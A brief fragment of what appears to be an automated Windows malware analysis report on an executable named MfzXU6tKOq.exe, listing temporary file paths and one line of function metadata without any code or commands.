C:\Users\user\AppData\Local\Temp\tmp54BA.tmp

C:\Users\user\AppData\Local\Temp\tmp54BB.tmp

C:\Users\user\AppData\Local\Temp\tmp54CB.tmp

Windows Analysis Report
MfzXU6tKOq.exe

Function 06ABF260 Relevance: 3.1, Strings: 2, Instructions: 642
COMMON